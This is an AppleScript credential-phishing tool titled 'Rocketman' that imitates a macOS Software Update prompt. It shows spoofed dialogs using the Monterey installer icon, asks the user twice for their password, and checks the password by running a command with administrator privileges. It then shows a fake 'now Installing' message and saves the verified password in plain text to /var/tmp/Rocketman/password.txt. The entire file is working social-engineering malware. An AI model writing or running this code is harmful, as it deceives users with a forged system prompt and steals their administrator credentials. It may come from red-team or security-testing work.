#!/usr/bin/osascript

(*

██████╗  ██████╗  ██████╗██╗  ██╗███████╗████████╗███╗   ███╗ █████╗ ███╗   ██╗
██╔══██╗██╔═══██╗██╔════╝██║ ██╔╝██╔════╝╚══██╔══╝████╗ ████║██╔══██╗████╗  ██║
██████╔╝██║   ██║██║     █████╔╝ █████╗     ██║   ██╔████╔██║███████║██╔██╗ ██║
██╔══██╗██║   ██║██║     ██╔═██╗ ██╔══╝     ██║   ██║╚██╔╝██║██╔══██║██║╚██╗██║
██║  ██║╚██████╔╝╚██████╗██║  ██╗███████╗   ██║   ██║ ╚═╝ ██║██║  ██║██║ ╚████║
╚═╝  ╚═╝ ╚═════╝  ╚═════╝╚═╝  ╚═╝╚══════╝   ╚═╝   ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝

        Name: Hugo Immediato 
Description: Get Password for macOS Upgrade

*)

set currentuser to do shell script "echo $USER"
set questionadmin to "macOS Software Update Requires your password. Please enter your password."

repeat
	try
		set first_password_prompt to text returned of (display dialog questionadmin default answer "" buttons {"OK", "Cancel"} default button 1 with title ("macOS Software Update Required") with icon POSIX file "/Applications/Install macOS Monterey.app/Contents/Resources/InstallAssistant.icns" with hidden answer)
		set second_password_prompt to text returned of (display dialog "Please verify and re-type your password" buttons {"OK", "Cancel"} default button 1 with title ("macOS Software Update Required") with icon POSIX file "/Applications/Install macOS Monterey.app/Contents/Resources/InstallAssistant.icns" default answer "" with hidden answer)
		
		if (second_password_prompt is not equal to first_password_prompt) then
			display dialog "Password Incorrect. Please Try Again." with icon stop
		else
			try
				do shell script "ls" user name currentuser password first_password_prompt with administrator privileges
				set admin_passwd to second_password_prompt
				exit repeat
			on error err
				display dialog "Password Incorrect. Please Try Again." with icon stop
				
			end try
		end if
		
	on error number -128
		set canceldialog to display dialog "Cancel was Selected, " & currentuser & " is Not able to Update macOS. " & currentuser & " must enter their password to update, Please retry." buttons {"OK"} default button 1 with icon stop
		try
			if button returned of canceldialog is "OK" then
				return
			end if
		end try
		
	end try
end repeat

try
	if (second_password_prompt is equal to first_password_prompt) then
		display dialog "macOS Monterey is now Installing. This process may take up to an hour. Do Not Interact with your Computer. Your Computer will Restart." buttons {"Okay"} default button "Okay" with title ("macOS Software Update Required") with icon POSIX file "/Applications/Install macOS Monterey.app/Contents/Resources/InstallAssistant.icns"
	end if
end try

do shell script "sudo mkdir /var/tmp/Rocketman/" with administrator privileges
do shell script "sudo touch /var/tmp/Rocketman/password.txt" with administrator privileges
do shell script "sudo echo " & admin_passwd & "> " & "/var/tmp/Rocketman/password.txt" with administrator privileges
